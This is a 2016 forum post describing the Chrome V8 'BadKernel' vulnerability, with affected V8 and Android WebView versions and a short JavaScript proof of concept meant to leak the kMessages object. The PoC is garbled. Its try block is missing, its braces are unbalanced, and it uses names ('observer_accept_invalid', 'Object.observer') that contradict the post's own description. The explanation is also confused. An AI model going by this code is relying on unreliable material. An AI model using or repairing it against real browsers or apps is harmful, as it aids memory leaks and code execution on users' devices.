HackerTop - View topic - Google Chrome V8 BadKernel Vulnerability
View unanswered posts | View active topics It is currently Tue Apr 07, 2020 1:50 pm

Reply to topic  [ 1 post ] 
 Google Chrome V8 BadKernel Vulnerability 
Author Message
User avatar

Joined: Sun Jul 24, 2016 12:11 pm
Posts: 10
Reply with quote
Google V8 JavaScript Engine is Chrome browser for the development of a set of open source JavaScript engine.

The vulnerability is due to the source code in the "observe_accept_invalid" exception type was mistakenly written as "observe_invalid_accept"".

An attacker can use the vulnerability to cause kMessages key object information leakage, the implementation of arbitrary code.

Based on the 4.4.4 Android to 5.1 version of the system WebView controls the development of mobile phone APP are likely to be affected by the vulnerability.

Google Chrome V8 : 3.20 ~ 4.2 Version

Android: 4.4.4 ~ 5.1 Version

Proof of Concept
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script type="text/javascript">
    var kMessages;
    Object.prototype.__defineGetter__("observer_accept_invalid", function(){kMessages=this});
        Object.observer({},function(){}, 1);
    } catch(e) {
    delete Object.prototype["observer_accept_invalid"];




If the browser can access the following page, if you can get the kMessages object,

Output object name is vulnerability

If output undefined does't vulnerability.



http://www.cnnvd.org.cn/vulnerability/s ... 2016080414

Tue Aug 23, 2016 11:14 am
Display posts from previous:  Sort by  
Reply to topic   [ 1 post ] 

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
Copyright © 2003-2016 HackerTop. All rights reserved.
Privacy & Cookies Policy
Community Forum Software by phpBB